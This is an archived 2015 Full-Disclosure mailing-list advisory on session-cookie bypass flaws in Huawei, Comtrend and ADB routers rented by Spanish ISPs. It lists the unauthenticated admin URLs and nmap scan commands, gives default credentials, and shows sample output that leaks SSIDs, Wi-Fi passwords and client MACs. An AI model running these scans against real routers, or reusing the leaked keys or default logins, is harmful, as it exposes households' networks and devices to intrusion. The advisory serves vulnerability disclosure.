lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAGSo8sdpZFWjqCkVcvzyROEjnRCX52sabjDHOROWVd-GDRAkGw@mail.gmail.com> Date: Fri, 20 Nov 2015 11:17:16 +0100 From: Daniel Díez <danihzt@...il.com> To: fulldisclosure@...lists.org Subject: [FD] Leak information on Huawei HG253s v2, Comtrend VG 8050 and ADB P.DGA4001N (HomeStation) Huawei HG253s v2 Vodafone-Spain is starting to rent a new Huawei HG253v2 router to the spanish costumers. This new router is coming with a new firmware version. This bug has been found by @VicenDominguez Vulnerability Basically, it is not validating the session cookie in some administration webpages. So, It is possible to get direct information from those urls in any router open to internet. http://IPhtml_253s/api/ntwk/WlanBasic http://IP/html_253s/api/system/diagnose_internet http://IP/html_253s/api/system/hostinfo?type=ethhost http://IP/html_253s/api/system/hostinfo?type=guesthost http://IP/html_253s/api/system/hostinfo?type=homehost http://IP/html_253s/api/system/hostinfo?type=wifihost http://IP/html_253s/api/system/wizardcfg Usage nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x Nmap scan report for x.x.x.x (x.x.x.x) Host is up (0.34s latency). PORT STATE SERVICE 80/tcp open http | http-enum-vodafone-hua253s: | SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456 | Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX Comtrend VG 8050 Telefonica-Spain is starting to rent a new Comtrend VG 8050 router to the spanish costumers. This new router is coming with a new firmware version. This bug has been found by @DaniLabs Vulnerability Basically, it is not validating the session cookie in some administration webpages. So, It is possible to get direct information from those urls in any router open to internet. http://IP/getWifiInfo.jx http://IP/listDevices.jx http://IP/infoApplications.jx Usage nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x Nmap scan report for x.x.x.x (x.x.x.x) Host is up (0.34s latency). PORT STATE SERVICE 80/tcp open http | http-enum-telefonica-comtrend-vg-8050: | SSID: MOVISTAR_XXX | Cipher Algorithm: WPA | Password WEP: | Password WPA: gTU3NkXE44RYjuM2RrxM | Password WPA2: | Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X ADB P.DGA4001N (HomeStation) Telefonica-Spain is starting to rent a new ADB P.DGA4001N router to the spanish costumers. This new router is coming with a new firmware version. This bug has been found by @DaniLabs Vulnerability Basically, it is not validating the session cookie in some administration webpages. So, It is possible to get direct information from those urls in any router open to internet. http://IP/getWifiInfo.jx http://IP/listDevices.jx http://IP/infoApplications.jx Add the credentials by default are admin / 1234 Usage nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x Nmap scan report for x.x.x.x (x.x.x.x) Host is up (0.34s latency). PORT STATE SERVICE 80/tcp open http | http-enum-telefonica-homestation: | SSID: WLAN_HOME | Cipher Algorithm: WEP | Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X Here the scripts https://github.com/DaniLabs/scripts-nse _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists